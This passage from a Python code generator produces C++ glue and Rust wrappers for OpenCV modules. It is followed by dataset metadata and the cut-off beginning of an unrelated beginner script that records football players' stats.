decl[3]:\n            self.args.append(ArgInfo(gen, a))\n        if self.isconstructor:\n            self.name = \"new\"\n        self.const = \"/C\" in decl[2]\n\n        # register self to class or generator\n        if self.class_nested_cppname == \"\":\n            gen.functions.append(self)\n        elif gen.is_ignored(self.class_nested_cppname):\n            logging.info('ignored: %s', self)\n        elif self.class_nested_cppname in ManualFuncs:\n            logging.info('manual: %s', self)\n        elif gen.is_ignored(self.class_nested_cppname):\n            pass\n        else:\n            self.ci = gen.get_class(self.class_nested_cppname)\n            self.ci.add_method(self)\n\n    def rv_header_type(self):\n        return self.ci.nested_cppname if self.isconstructor else self.type\n\n    def rv_type(self):\n        return 
self.gen.get_type_info(self.rv_header_type())\n\n def reason_to_skip(self):\n if self.overridename == \"operator ()\":\n msg = \"can not map operator () yet\"\n return msg\n\n for a in self.args:\n if self.gen.is_ignored(a.type):\n msg = \"can not map type %s yet\"%(a.type)\n return msg\n\n return None\n\n def gen_cpp_prelude(self):\n io = StringIO()\n io.write(\"// %s %s %s\\n\"%(self.cppname,\n \"(constructor)\" if self.isconstructor else \"(method)\",\n \"(const)\" if self.const else \"(mut)\"))\n io.write(\"// %s\\n\"%(self))\n for a in self.args:\n io.write(\"// Arg %s %s =%s\\n\"%(a.name, a.type_info(), a.defval))\n io.write(\"// Return value: %s\\n\"%(self.rv_type()))\n return io.getvalue()\n\n def c_name(self):\n if len(self.args) > 0:\n suffix = \"_\" + \"\".join(map(lambda a:a.type[0].capitalize(), self.args))\n else:\n suffix = \"\"\n if self.ci == None:\n return \"cv_%s_%s%s\"%(self.gen.module, self.overridename, suffix);\n else:\n return \"cv_%s_%s_%s%s\"%(self.gen.module, self.ci.nested_cname, self.overridename, suffix);\n\n # \"const\", \"mut\", or None\n def instance(self):\n if not self.ci == None and not self.isconstructor:\n return \"const\" if self.const else \"mut\"\n return None\n\n def gen_rust_extern(self):\n rust_extern_rs = \"rv::cv_return_value_%s\"%(self.rv_type().ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\"))\n\n args = []\n if self.instance():\n args.append(\"instance: *%s c_void\"%(self.instance()))\n for a in self.args:\n atype = a.type_info()\n args.append(a.rsname() + \": \" + (atype.rctype or atype.rtype))\n\n return \"pub fn %s(%s) -> %s;\\n\"%(self.c_name(), \", \".join(args), rust_extern_rs)\n\n def gen_rustdoc_default_args(self):\n rust_args_default_doc = \"\"\n for a in self.args:\n atype = a.type_info()\n if a.defval != \"\":\n rust_args_default_doc += \\\n \" /// * %s: default %s\\n\"%(a.rsname(), a.defval)\n return rust_args_default_doc\n\n def gen_rust_wrapper(self):\n args = []\n call_args = []\n if self.instance() == \"const\":\n args.append(\"&self\")\n call_args.append(\"self.as_ptr()\")\n elif self.instance() == \"mut\":\n args.append(\"&mut self\")\n call_args.append(\"self.as_ptr()\")\n\n for a in self.args:\n atype = a.type_info()\n rtype = atype.rtype\n\n if atype.is_string:\n args.append(\"%s:&str\"%(a.rsname()))\n elif atype.is_primitive or atype.is_value or atype.is_simple:\n args.append(a.rsname() + \":\" + rtype)\n elif a.out == \"O\" or a.out == \"IO\":\n args.append(a.rsname() + \":&mut \" + rtype)\n else:\n args.append(a.rsname() + \":& \" + rtype)\n\n if atype.is_boxed or atype.is_vector \\\n or atype.is_vector_of_vector or atype.is_ptr:\n call_args.append(\"%s.ptr\"%(a.rsname()))\n elif atype.is_string:\n call_args.append(\"CString::new(%s).unwrap().as_ptr()\"%(a.rsname()))\n else:\n call_args.append(\"%s\"%(a.rsname()))\n\n\n pub = \"\" if self.ci and self.ci.type_info().is_trait else \"pub \"\n rname = renamed_funcs.get(self.c_name()) or (\"new\" if self.isconstructor else self.overridename)\n\n io = StringIO()\n io.write(\" %sfn %s(%s) -> Result<%s,String> {\\n\"%(pub, rname, \", \".join(args), self.rv_type().rrvtype or self.rv_type().rtype))\n io.write(\" unsafe {\\n\")\n io.write(\" let rv = ::%s(%s);\\n\"%(self.c_name(), \", \".join(call_args)))\n io.write(\" if rv.error_msg as i32 != 0i32 {\\n\")\n io.write(\" let v = CStr::from_ptr(rv.error_msg).to_bytes().to_vec();\\n\");\n io.write(\" ::libc::free(rv.error_msg as *mut c_void);\\n\")\n io.write(\" return Err(String::from_utf8(v).unwrap())\\n\")\n 
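        # The writes above emit the wrapper's error branch: every generated\n        # extern returns a cv_return_value_* struct whose error_msg field is\n        # a strdup()ed C string on failure (see the catch blocks emitted in\n        # gen_func), so the Rust side frees it and maps it to Err(String).\n        # The writes below unpack the success value by return type.\n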
io.write(\" }\\n\");\n if self.type == \"void\":\n io.write(\" Ok(())\\n\");\n elif self.rv_type().is_string:\n io.write(\" let v = CStr::from_ptr(rv.result).to_bytes().to_vec();\\n\");\n io.write(\" ::libc::free(rv.result as *mut c_void);\\n\");\n io.write(\" Ok(String::from_utf8(v).unwrap())\\n\");\n elif self.rv_type().is_boxed:\n io.write(\" Ok(%s{ ptr: rv.result })\\n\"%(self.rv_type().rtype))\n elif self.type == \"bool\":\n io.write(\" Ok(rv.result!=0)\\n\")\n else:\n io.write(\" Ok(rv.result)\\n\")\n io.write(\" }\\n\");\n io.write(\" }\\n\")\n\n return io.getvalue()\n\n def __repr__(self):\n return Template(\"FUNC <$type $namespace.$classpath.$name $args>\").substitute(**self.__dict__)\n\nclass ClassPropInfo():\n def __init__(self, decl): # [f_ctype, f_name, '', '/RW']\n self.ctype = decl[0]\n self.name = decl[1]\n self.rw = \"/RW\" in decl[3]\n\n def __repr__(self):\n return Template(\"PROP $ctype $name\").substitute(ctype=self.ctype, name=self.name)\n\nclass ClassInfo(GeneralInfo):\n def __init__(self, gen, decl, namespaces=[]): # [ 'class/struct cname', ': base', [modlist] ]\n GeneralInfo.__init__(self, gen, decl[0], namespaces)\n self.methods = []\n self.simple = False\n self.nested = False\n for m in decl[2]:\n if m == \"/Simple\" or m == \"/Map\" :\n self.simple = True\n if len(decl[0].split(\".\")) > 2:\n self.nested = True\n self.nested_cppname = \"::\".join(decl[0].split(\".\")[1:])\n self.nested_cname = \"_\".join(decl[0].split(\".\")[1:])\n self.base = decl[1].split(\" \")[1].split(\"::\")[1] if len(decl)>1 and len(decl[1])>1 else \"\"\n\n # class props\n self.props= []\n for p in decl[3]:\n self.props.append( ClassPropInfo(p) )\n\n # register\n if not gen.is_ignored(self.nested_cppname):\n gen.classes[self.name] = self\n\n def __repr__(self):\n# return Template(\"CLASS $namespace.$classpath.$name : $base\").substitute(**self.__dict__)\n return Template(\"CLASS $namespace.$classpath.$name simple:$simple\").substitute(**self.__dict__)\n\n def add_method(self, fi):\n self.methods.append(fi)\n\n def getAllMethods(self):\n result = []\n result.extend([fi for fi in sorted(self.methods) if fi.isconstructor])\n result.extend([fi for fi in sorted(self.methods) if not fi.isconstructor])\n return result\n\n def has_constructor(self):\n for fi in self.methods:\n if fi.isconstructor:\n return True\n return False\n\n def type_info(self):\n return self.gen.get_type_info(self.nested_cppname)\n\nclass ConstInfo(GeneralInfo):\n def __init__(self, gen, decl, addedManually=False, namespaces=[]):\n GeneralInfo.__init__(self, gen, decl[0], namespaces)\n self.fullname = decl[0].split(\" \")[1]\n if len(self.fullname.split(\".\")) > 1:\n self.rustname = \"_\".join(self.fullname.split(\".\")[1:])\n else:\n self.rustname = self.fullname\n self.cname = self.name.replace(\".\", \"::\")\n self.value = decl[1]\n self.addedManually = addedManually\n\n # register\n if self.isIgnored():\n logging.info('ignored: %s', self)\n elif not gen.get_const(self.name):\n gen.consts.append(self)\n\n def __repr__(self):\n return Template(\"CONST $name=$value$manual\").substitute(name=self.name,\n value=self.value,\n manual=\"(manual)\" if self.addedManually else \"\")\n\n def isIgnored(self):\n for c in const_ignore_list:\n if re.match(c, self.name):\n return True\n return False\n\n def gen_rust(self):\n if self.value.startswith('\"'):\n return \"pub const %s:&'static str = %s;\\n\"%(self.rustname, self.value)\n elif re.match(\"^(-?[0-9]+|0x[0-9A-F]+)$\", self.value):\n return \"pub const %s:i32 = 
%s;\\n\"%(self.rustname, self.value)\n return None\n\n def gen_cpp_for_complex(self):\n # only use C-constant dumping for unnested const\n if len(self.fullname.split(\".\")) > 2:\n return \"\"\n else:\n return \"\"\" printf(\"pub const %s:i32 = 0x%%x;\\\\n\", %s);\\n\"\"\"%(self.rustname, self.name)\n\nclass TypeInfo():\n def __init__(self, gen, typeid):\n self.gen = gen\n self.typeid = typeid\n\n self.is_string = typeid == \"string\"\n self.is_primitive = typeid in primitives\n self.is_ptr = typeid.startswith(\"Ptr::\")\n self.is_vector_of_vector = typeid.startswith(\"vector::vector::\")\n self.is_vector = typeid.startswith(\"vector::\")\n self.is_ignored = typeid.split(\"::\")[-1] in class_ignore_list\n\n self.class_info = None\n if typeid in self.gen.classes:\n self.class_info = self.gen.classes[typeid]\n self.is_simple = self.class_info and self.class_info.simple\n self.is_value = self.is_simple\n for k in value_struct_types:\n if k[1] == typeid:\n self.is_value = True\n self.is_boxed = not (self.is_value or self.is_simple\n or self.is_primitive or self.is_string)\n self.is_trait = self.class_info and not(self.is_value) and not(self.is_simple) and not self.class_info.has_constructor()\n\n typeid_underscore = typeid.replace(\"::\",\"_\")\n if self.is_value or self.is_simple:\n self.cpptype = typeid\n self.ctype = \"cv_struct_\" + typeid_underscore\n self.rtype = self.rctype = self.rrvtype = typeid_underscore\n elif self.is_primitive:\n self.cpptype = typeid\n self.ctype = primitives[typeid][\"ctype\"]\n self.rtype = self.rctype = self.rrvtype = primitives[typeid][\"rtype\"]\n elif self.is_vector_of_vector:\n self.ctype = \"void*\"\n self.rctype = \"*mut c_void\"\n self.cppelemtype = \"vector<%s>\"%(typeid.split(\"::\")[-1])\n self.cpptype = \"vector< %s >\"%(self.cppelemtype)\n self.relemtype = \"VectorOf%s\"%(typeid.split(\"::\")[2])\n self.rtype = self.rrvtype = \"VectorOf%s\"%(self.relemtype)\n self.gen_template_wrapper_rust_struct()\n elif self.is_vector:\n self.ctype = \"void*\"\n self.cppelemtype = typeid.split(\"::\")[-1]\n self.cpptype = \"vector<%s>\"%(self.cppelemtype)\n self.rctype = \"*mut c_void\"\n self.relemtype = typeid.split(\"::\")[1]\n self.rtype = self.rrvtype = \"VectorOf%s\"%(self.relemtype)\n if self.relemtype == \"string\":\n self.relemtype = \"String\"\n elif self.relemtype[0].islower():\n self.relemtype = \"c_%s\"%(self.relemtype)\n elif self.relemtype in ('KeyPoint', 'DMatch'):\n self.relemtype = \"features2d::%s\"%(self.relemtype)\n else:\n self.relemtype = \"core::%s\"%(self.relemtype)\n self.gen_template_wrapper_rust_struct()\n elif self.is_ptr:\n self.ctype = \"void*\"\n self.rctype = \"*mut c_void\"\n self.cpptype = \"Ptr<%s>\"%(typeid.split(\"::\")[-1])\n self.rtype = self.rrvtype = \"PtrOf%s\"%(typeid.split(\"::\")[1])\n self.gen_template_wrapper_rust_struct()\n elif self.is_string:\n self.ctype = \"const char*\"\n self.cpptype = \"string\"\n self.rtype = self.rctype = \"*const ::libc::c_char\"\n self.rrvtype = \"String\"\n else:\n self.ctype = \"void*\"\n self.cpptype = self.rtype = self.rrvtype = typeid\n self.rctype = \"*mut c_void\"\n\n def __repr__(self):\n r = [ ]\n if self.is_string: r.append(\"(string)\")\n if self.is_primitive: r.append(\"(prim)\")\n if self.is_simple: r.append(\"(simple)\")\n if self.is_value: r.append(\"(value)\")\n if self.is_vector: r.append(\"(vector)\")\n if self.is_vector_of_vector: r.append(\"(vector_of_vector)\")\n if self.is_ptr: r.append(\"(ptr)\")\n if self.is_trait: r.append(\"(trait)\")\n return self.typeid + \" 
\" + \"\".join(r)\n\n\n def gen_template_wrapper_rust_struct(self):\n with open(self.gen.output_path+\"/\"+self.rtype+\".type.rs\", \"w\") as f:\n f.write(\"#[allow(dead_code)] pub struct %s { pub ptr: *mut c_void }\\n\"%(self.rtype));\n if self.rtype.startswith(\"VectorOf\"):\n if self.rtype.startswith(\"VectorOfstring\"):\n rrawelemtype = \"*mut c_char\"\n rconv = \"CStr::from_ptr(elem).to_string_lossy().into_owned()\"\n else:\n rrawelemtype = self.relemtype\n rconv = \"elem\"\n f.write(Template(\"\"\"\n extern \"C\" {\n fn cv_new_$rtype() -> *mut c_void;\n fn cv_delete_$rtype(ptr:*mut c_void) -> ();\n fn cv_${rtype}_len(ptr:*mut c_void) -> i32;\n fn cv_${rtype}_at(ptr:*mut c_void, index: c_int, elem:*mut $rrawelemtype);\n }\n impl $rtype {\n pub fn new() -> $rtype {\n unsafe { return $rtype { ptr:cv_new_$rtype() } };\n }\n pub fn into_vec(self: $rtype) -> Vec<$relemtype> {\n unsafe {\n let mut result = Vec::with_capacity(cv_${rtype}_len(self.ptr) as usize);\n for index in 0..result.capacity() {\n let mut elem: $rrawelemtype = uninitialized();\n cv_${rtype}_at(self.ptr, index as i32, &mut elem);\n result.push($rconv);\n }\n return result\n }\n }\n }\n impl Drop for $rtype {\n fn drop(&mut self) {\n unsafe { cv_delete_$rtype(self.ptr) };\n }\n }\\n\"\"\").substitute(rtype=self.rtype, relemtype=self.relemtype,\n rrawelemtype=rrawelemtype, rconv=rconv))\n if self.rtype.startswith(\"VectorOf\"):\n with open(self.gen.output_path+\"/\"+self.rtype+\".type.cpp\", \"w\") as f:\n if self.rtype.startswith(\"VectorOfstring\"):\n cppelemtype = \"const char*\"\n cppconv = \".c_str()\"\n else:\n cppelemtype = self.cppelemtype\n cppconv = \"\"\n f.write(Template(\"\"\"\n #include \"opencv2/opencv_modules.hpp\"\n #include \"opencv2/$module/$module.hpp\"\n using namespace cv;\n extern \"C\" {\n void* cv_new_$rtype() { return new std::$cpptype(); }\n void cv_delete_$rtype(void* ptr) { delete (($cpptype*) ptr); }\n int cv_${rtype}_len(void* ptr) { return (($cpptype*) ptr)->size(); }\n void cv_${rtype}_at(void* ptr, int index, $cppelemtype* elem) {\n *elem = (*(($cpptype*) ptr))[index]$cppconv;\n }\n }\\n\"\"\").substitute(\n rtype=self.rtype, cpptype=self.cpptype, cppelemtype=cppelemtype,\n cppconv=cppconv, module=self.gen.module))\n\n#\n# GENERATOR\n#\n\nclass RustWrapperGenerator(object):\n def __init__(self):\n self.clear()\n\n def clear(self):\n self.module = \"\"\n self.Module = \"\"\n self.classes = { }\n self.functions = [];\n self.ported_func_list = []\n self.skipped_func_list = []\n self.consts = []\n self.type_infos = {}\n\n def get_class(self, classname):\n return self.classes[classname]\n\n def get_type_info(self, typeid):\n if not typeid in self.type_infos:\n self.type_infos[typeid] = TypeInfo(self, typeid)\n return self.type_infos[typeid]\n\n def get_const(self, name):\n for c in self.consts:\n if c.cname == name:\n return c\n return None\n\n def add_decl(self, decl):\n name = decl[0]\n if name.startswith(\"struct\") or name.startswith(\"class\"):\n ClassInfo(self, decl, namespaces=self.namespaces)\n elif name.startswith(\"const\"):\n ConstInfo(self, decl, namespaces=self.namespaces)\n else:\n FuncInfo(self, decl, namespaces=self.namespaces)\n\n def gen(self, srcfiles, module, output_path):\n parser = hdr_parser.CppHeaderParser()\n self.output_path = output_path\n self.module = module\n self.Module = module.capitalize()\n includes = [];\n\n for hdr in srcfiles:\n decls = parser.parse(hdr)\n self.namespaces = parser.namespaces\n logging.info(\"\\n\\n===== Header: %s =====\", hdr)\n 
logging.info(\"Namespaces: %s\", parser.namespaces)\n if decls:\n includes.append('#include \"' + hdr + '\"')\n for decl in decls:\n logging.info(\"\\n--- Incoming ---\\n%s\", pformat(decl, 4))\n self.add_decl(decl)\n\n if module in ManualFuncs:\n for decl in ManualFuncs[self.module]:\n logging.info(\"\\n--- Manual ---\\n%s\", pformat(decl, 4))\n self.add_decl(decl)\n\n logging.info(\"\\n\\n===== Generating... =====\")\n self.moduleCppTypes = StringIO()\n self.moduleCppCode = StringIO()\n self.moduleCppConsts = StringIO()\n self.moduleRustCode = StringIO()\n self.moduleRustExterns = StringIO()\n\n for co in self.consts:\n rust = co.gen_rust()\n if rust:\n self.moduleRustCode.write(rust)\n else:\n self.moduleCppConsts.write(co.gen_cpp_for_complex())\n\n if self.moduleCppConsts.getvalue != \"\":\n self.moduleRustCode.write(\n \"\"\"include!(concat!(env!(\"OUT_DIR\"), \"/%s.consts.rs\"));\\n\"\"\"%(self.module)\n )\n\n for ci in self.classes.values():\n if ci.nested:\n self.gen_nested_class_decl(ci)\n\n for c in value_struct_types:\n if c[0] == module:\n self.gen_value_struct(c)\n\n for c in self.classes.values():\n if c.simple:\n self.gen_simple_class(c)\n\n for fi in self.functions:\n self.gen_func(fi)\n\n if module in forced_boxed_classes:\n for cb in forced_boxed_classes[module]:\n self.gen_boxed_class(cb)\n\n for ci in self.classes.values():\n self.gen_class(ci)\n\n with open(output_path+\"/types.h\", \"a\") as f:\n f.write(self.moduleCppTypes.getvalue())\n\n with open(output_path+\"/\" + self.module + \".consts.cpp\", \"w\") as f:\n f.write(\"\"\"#include \\n\"\"\")\n f.write(\"\"\"#include \"opencv2/opencv_modules.hpp\"\\n\"\"\")\n f.write(\"\"\"#include \"opencv2/%s/%s.hpp\"\\n\"\"\"%(module,module))\n f.write(\"\"\"using namespace cv;\\n\"\"\")\n f.write(\"int main(int argc, char**argv) {\\n\");\n f.write(self.moduleCppConsts.getvalue())\n f.write(\"}\\n\");\n\n with open(output_path+\"/\"+module+\".cpp\", \"w\") as f:\n f.write(Template(T_CPP_MODULE).substitute(m = module, M = module.upper(), code = self.moduleCppCode.getvalue(), includes = \"\\n\".join(includes)))\n\n with open(output_path+\"/%s.externs.rs\"%(module), \"w\") as f:\n f.write(\"extern \\\"C\\\" {\\n\")\n f.write(self.moduleRustExterns.getvalue())\n f.write(\"}\\n\")\n\n with open(output_path+\"/\"+module+\".rs\", \"w\") as f:\n f.write(Template(T_RUST_MODULE).substitute(m = module, M = module.upper(), code = self.moduleRustCode.getvalue(), module_import = (\"use ::sys::core::*;\\n\" if not module == \"core\" else \"\")))\n\n with open(output_path+\"/\"+module+\".txt\", \"w\") as f:\n f.write(self.makeReport())\n\n def makeReport(self):\n '''\n Returns string with generator report\n '''\n report = StringIO()\n total_count = len(self.ported_func_list)+ len(self.skipped_func_list)\n report.write(\"PORTED FUNCs LIST (%i of %i):\\n\\n\" % (len(self.ported_func_list), total_count))\n report.write(\"\\n\".join(self.ported_func_list))\n report.write(\"\\n\\nSKIPPED FUNCs LIST (%i of %i):\\n\\n\" % (len(self.skipped_func_list), total_count))\n report.write(\"\".join(self.skipped_func_list))\n return report.getvalue()\n\n def is_ignored(self, type_name):\n return type_name.split(\"::\")[-1] in class_ignore_list\n\n\n def gen_vector_struct_for(self, name):\n struct_name = \"cv_vector_of_\"+name\n self.defined_in_types_h.appand(struct_name)\n self.moduleCppTypes.write\n\n def gen_func(self, fi):\n reason = fi.reason_to_skip()\n if reason:\n self.skipped_func_list.append(\"%s\\n %s\\n\"%(fi,reason))\n return\n 
self.ported_func_list.append(fi.__repr__())\n\n rv_header_type = fi.rv_header_type()\n rv_info = self.get_type_info(rv_header_type)\n\n self.moduleCppCode.write(fi.gen_cpp_prelude())\n\n decl_c_args = \"\\n \"\n call_cpp_args = \"\"\n if not fi.ci == None and not fi.isconstructor:\n decl_c_args += self.get_type_info(fi.ci.name).ctype + \" instance\"\n for a in fi.args:\n atype = a.type_info()\n if not decl_c_args.strip() == \"\":\n decl_c_args+=\",\\n \"\n if not call_cpp_args == \"\":\n call_cpp_args += \", \"\n\n rw = a.out == \"O\" or a.out == \"IO\"\n\n\n arg_decl_star = not atype.is_boxed and rw\n if atype.is_string:\n decl_c_args += \"const char *\" + a.name\n elif arg_decl_star:\n decl_c_args += atype.ctype + \" *\" + a.name\n else:\n decl_c_args += atype.ctype + \" \" + a.name\n\n if atype.is_boxed or atype.is_vector \\\n or atype.is_vector_of_vector or atype.is_ptr:\n call_cpp_args += \"*((%s*)%s)\"%(atype.cpptype, a.name)\n elif atype.is_string:\n call_cpp_args += a.name\n elif atype.is_value or atype.is_simple:\n if arg_decl_star and a.pointer:\n call_cpp_args += \"reinterpret_cast<\" + atype.cpptype + \"*>(\" + a.name + \")\"\n elif arg_decl_star and not a.pointer:\n call_cpp_args += \"*reinterpret_cast<\" + atype.cpptype + \"*>(\" + a.name + \")\"\n elif a.pointer:\n call_cpp_args += \"reinterpret_cast<\" + atype.cpptype + \"*>(&\" + a.name + \")\"\n else:\n call_cpp_args += \"*reinterpret_cast<\" + atype.cpptype + \"*>(&\" + a.name + \")\"\n else:\n if arg_decl_star and a.pointer:\n call_cpp_args += a.name\n elif not arg_decl_star and not a.pointer:\n call_cpp_args += a.name\n else:\n call_cpp_args += \"*\" + a.name\n\n\n # C function prototype\n self.moduleCppCode.write(\"struct cv_return_value_%s %s(%s) {\\n\"%(rv_info.ctype.replace(\" \",\"_\").replace(\":\",\"_\").replace(\" \",\"_\").replace(\"*\", \"_\"), fi.c_name(), decl_c_args));\n\n self.moduleCppCode.write(\" try {\\n\");\n # cpp method call with prefix\n if fi.ci == None:\n call_name = \"cv::\" + fi.cppname\n elif fi.isconstructor and fi.ci.type_info().is_boxed:\n call_name = fi.ci.nested_cppname\n elif fi.cppname == \"()\":\n call_name = \"(*((%s*) instance))\"%(self.get_type_info(fi.ci.name).cpptype)\n else:\n call_name = \"((%s*) instance)->%s\"%(self.get_type_info(fi.ci.name).cpptype, fi.cppname)\n\n # actual call\n if fi.type == \"void\":\n self.moduleCppCode.write(\" %s(%s);\\n\"%(call_name, call_cpp_args))\n elif fi.isconstructor and rv_info.is_boxed:\n self.moduleCppCode.write(\" %s* cpp_return_value = new %s(%s);\\n\"%(rv_info.cpptype, call_name,\n call_cpp_args));\n elif fi.isconstructor and call_cpp_args != \"\":\n self.moduleCppCode.write(\" %s cpp_return_value(%s);\\n\"%(rv_info.cpptype, call_cpp_args));\n elif fi.isconstructor:\n self.moduleCppCode.write(\" %s cpp_return_value;\\n\"%(rv_info.cpptype));\n else:\n self.moduleCppCode.write(\" %s cpp_return_value = %s(%s);\\n\"%(rv_info.cpptype, call_name,\n call_cpp_args));\n\n self.gen_c_return_value_type(rv_info);\n\n # return value\n if fi.type == \"void\":\n self.moduleCppCode.write(\" return { NULL, 0 };\\n\");\n elif rv_info.is_string:\n self.moduleCppCode.write(\" return { NULL, strdup(cpp_return_value.c_str()) };\");\n elif rv_info.is_boxed and not fi.isconstructor:\n self.moduleCppCode.write(\" return { NULL, new %s(cpp_return_value) };\\n\"%(rv_info.cpptype));\n elif rv_info.is_boxed and fi.isconstructor:\n self.moduleCppCode.write(\" return { NULL, cpp_return_value };\\n\")\n elif rv_info.is_value:\n self.moduleCppCode.write(\" return { NULL, 
*reinterpret_cast(&cpp_return_value) };\\n\"%(rv_header_type.replace(\"::\", \"_\")))\n elif rv_info.is_vector:\n self.moduleCppCode.write(\" return { NULL, (void*) new %s(cpp_return_value) };\\n\"%(rv.info.cpptype));\n else:\n self.moduleCppCode.write(\" return { NULL, cpp_return_value };\\n\");\n\n self.moduleCppCode.write(\"} catch (cv::Exception& e) {\\n\");\n self.moduleCppCode.write(\" char* msg = strdup(e.what());\\n\");\n self.moduleCppCode.write(\" return { msg, 0 };\\n\");\n self.moduleCppCode.write(\"} catch (...) {\\n\");\n self.moduleCppCode.write(\" char* msg = strdup(\\\"unspecified error in OpenCV guts\\\");\\n\");\n self.moduleCppCode.write(\" return { msg, 0 };\\n\");\n self.moduleCppCode.write(\"}\\n\");\n\n self.moduleCppCode.write(\"}\\n\\n\");\n\n # rust's extern C\n self.moduleRustExterns.write(fi.gen_rust_extern())\n\n # rust safe wrapper\n self.moduleRustCode.write(fi.gen_rustdoc_default_args())\n self.moduleRustCode.write(fi.gen_rust_wrapper())\n\n def gen_value_struct_field(self, name, typ):\n rsname = name\n if rsname in [\"box\", \"type\"]:\n rsname = \"_\" + rsname\n if \"[\" in typ:\n bracket = typ.index(\"[\")\n cppt = typ[:bracket]\n ct = self.get_type_info(cppt).ctype\n size = typ[bracket+1:-1]\n rst = self.get_type_info(cppt).rtype\n self.moduleCppTypes.write(\" %s %s[%s];\\n\"%(ct, name, size))\n self.moduleRustCode.write(\" pub %s: [%s;%s],\\n\"%(rsname, rst, size))\n else:\n cppt = typ\n ct = self.get_type_info(cppt).ctype\n rst = self.get_type_info(cppt).rtype\n self.moduleCppTypes.write(\" %s %s;\\n\"%(ct, name))\n self.moduleRustCode.write(\" pub %s: %s,\\n\"%(rsname, rst))\n\n def gen_value_struct(self, c):\n self.moduleCppTypes.write(\"typedef struct cv_struct_%s {\\n\"%(c[1]))\n self.moduleRustCode.write(\"#[repr(C)]#[derive(Debug,PartialEq)] pub struct %s {\\n\"%(c[1]))\n for field in value_struct_types[c]:\n self.gen_value_struct_field(field[0], field[1])\n self.moduleCppTypes.write(\"} cv_struct_%s;\\n\\n\"%(c[1]))\n self.moduleRustCode.write(\"}\\n\")\n\n def gen_simple_class(self,ci):\n self.moduleCppTypes.write(\"typedef struct cv_struct_%s {\\n\"%(ci.nested_cname))\n self.moduleRustCode.write(\"#[repr(C)]#[derive(Debug,PartialEq)] pub struct %s {\\n\"%(ci.nested_cname))\n for p in ci.props:\n self.gen_value_struct_field(p.name, p.ctype)\n self.moduleRustCode.write(\"}\\n\")\n self.moduleCppTypes.write(\"} cv_struct_%s;\\n\\n\"%(ci.nested_cname))\n\n def gen_c_return_value_type(self, typ):\n with open(self.output_path+\"/cv_return_value_\"+typ.ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\")+\".type.h\", \"w\") as f:\n f.write(Template(\"\"\"struct cv_return_value_$sane {\n char* error_msg;\n $ctype result;\n };\\n\"\"\").substitute(\n sane=typ.ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\"),\n ctype=\"int\" if typ.ctype == \"void\" else typ.ctype\n ))\n with open(self.output_path+\"/cv_return_value_\"+typ.ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\")+\".rv.rs\", \"w\") as f:\n f.write(Template(\"\"\"#[repr(C)] pub struct cv_return_value_$sane {\n pub error_msg: *const ::libc::types::os::arch::c95::c_char,\n pub result: $rtype\n }\\n\"\"\").substitute(\n sane=typ.ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\"),\n rtype=typ.rctype or typ.rtype\n ))\n\n def gen_boxed_class(self, name):\n cname = name\n cppname = name\n if name in self.classes:\n cname = self.classes[name].nested_cname\n cppname = self.classes[name].nested_cppname\n 
self.moduleRustExterns.write(\"pub fn cv_%s_delete_%s(ptr : *mut c_void);\\n\"%(self.module,cname));\n\n        self.moduleRustCode.write(Template(\"\"\"\n            #[allow(dead_code)]\n            pub struct $cname {\n                pub ptr: *mut c_void\n            }\n            impl Drop for $cname {\n                fn drop(&mut self) {\n                    unsafe { ::cv_${module}_delete_${cname}(self.ptr) };\n                }\n            }\n            impl $cname {\n                fn as_ptr(&self) -> *mut c_void { self.ptr }\n            }\n        \"\"\").substitute(cname=cname, module=self.module))\n        ci = self.get_class(name)\n        if ci.base:\n            self.moduleRustCode.write(Template(\"\"\"\n                impl $base for $cname {\n                    fn as_ptr(&self) -> *mut c_void { self.ptr }\n                }\n            \"\"\").substitute(cname=cname, base=ci.base))\n        self.moduleCppCode.write(\"void cv_%s_delete_%s(void* instance) {\\n\"%(self.module, cname));\n        self.moduleCppCode.write(\"    delete (cv::%s*) instance;\\n\"%(cppname));\n        self.moduleCppCode.write(\"}\\n\");\n\n    def gen_nested_class_decl(self, ci):\n        pass\n        #self.moduleCppCode.write(\"class %s;\\n\"%(ci.nested_cname));\n\n    def gen_class(self, ci):\n        t = self.get_type_info(ci.nested_cppname)\n        if t.is_trait:\n            self.moduleRustCode.write(\"pub trait %s {\\n\"%(ci.name))\n            self.moduleRustCode.write(\"    fn as_ptr(&self) -> *mut c_void;\\n\")\n            for fi in ci.getAllMethods():\n                self.gen_func(fi)\n            self.moduleRustCode.write(\"} // trait %s\\n\"%(ci.name))\n        else:\n            if t.is_boxed:\n                self.gen_boxed_class(ci.nested_cppname)\n            self.moduleRustCode.write(\"impl %s {\\n\"%(ci.name))\n            for fi in ci.getAllMethods():\n                self.gen_func(fi)\n            self.moduleRustCode.write(\"}\\n\");\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 4:\n        print(\"Usage:\\n\", \\\n            os.path.basename(sys.argv[0]), \\\n            \" <path to hdr_parser.py> <dst dir> <module name> <header> [<header> ...]\")\n        print(\"Current args are: \", \", \".join([\"'\"+a+\"'\" for a in sys.argv]))\n        exit(0)\n\n    hdr_parser_path = os.path.abspath(sys.argv[1])\n    if hdr_parser_path.endswith(\".py\"):\n        hdr_parser_path = os.path.dirname(hdr_parser_path)\n    sys.path.append(hdr_parser_path)\n    import hdr_parser\n    dstdir = sys.argv[2]\n    module = sys.argv[3]\n    srcfiles = sys.argv[4:]\n    logging.basicConfig(filename='%s/%s.log' % (dstdir, module), format=None, filemode='w', level=logging.INFO)\n    handler = logging.StreamHandler()\n    handler.setLevel(logging.WARNING)\n    logging.getLogger().addHandler(handler)\n    print(\"Generating module '\" + module + \"' from headers:\\n\\t\" + \"\\n\\t\".join(srcfiles))\n    generator = RustWrapperGenerator()\n    generator.gen(srcfiles, module, dstdir)\n","sub_path":"gen_rust.py","file_name":"gen_rust.py","file_ext":"py","file_size_in_byte":43451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"102244484","text":"lista = []\nplayer = {}\ngol = []\ntotal_gols = opc = index = 0\n\n# lista.append(dict.copy()) = without the copy this goes wrong, because it would store a reference to the same dict\n# ADDING ITEMS TO THE DICTIONARY\nwhile True:\n    #player.clear()\n    player['cod'] = index\n    player['nome'] = input(\"Enter the player's name: \")\n    quant = int(input(f\"How many matches did {player['nome']} play: \"))\n    cont = 1\n    while True:\n        